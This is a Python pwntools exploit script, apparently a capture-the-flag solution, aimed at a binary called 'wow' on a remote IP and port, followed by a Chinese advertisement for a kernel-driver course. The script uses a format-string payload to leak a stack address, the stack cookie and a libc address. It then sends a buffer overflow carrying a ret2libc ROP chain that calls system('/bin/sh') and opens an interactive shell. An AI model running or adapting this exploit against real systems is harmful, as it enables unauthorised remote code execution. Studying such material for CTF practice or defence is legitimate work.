from pwn import * # context.log_level = 'debug' target_file = './wow' context.binary = target_file libc_path = '/lib/x86_64-linux-gnu/libc.so.6' libc = ELF(libc_path) # io = process(['./linux_server64']) # io = process([target_file]) io = remote('139.199.99.130', 65188) # log.info("process base: " + hex(io.libs()[os.path.abspath(target_file)])) # log.info("process libc_base: " + hex(io.libs()[libc_path])) def test(): io.send('evXnaK') io.recvuntil('wow!\n') io.send('%1$lx\n%13$lx\n%15$lx\n') stack_addr = int(str(io.recvline()).strip(), 16) cookie = int(str(io.recvline()).strip(), 16) libc_addr = int(str(io.recvline()).strip(), 16) print('stack_addr: %s' % hex(stack_addr)) print('cookie: %s' % hex(cookie)) print('libc_addr: %s' % hex(libc_addr)) libc_base = libc_addr - 0x20830 print('libc_base: %s' % hex(libc_base)) buf = '' buf += '1'*32 buf += p64(0) * 7 buf += p64(cookie) buf += p64(0) buf += p64(libc_base + libc.search(asm('pop rdi;ret')).next()) buf += p64(libc_base + libc.search('/bin/sh\x00').next()) buf += p64(libc_base + libc.symbols['system']) io.send(buf) io.interactive() return test()
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
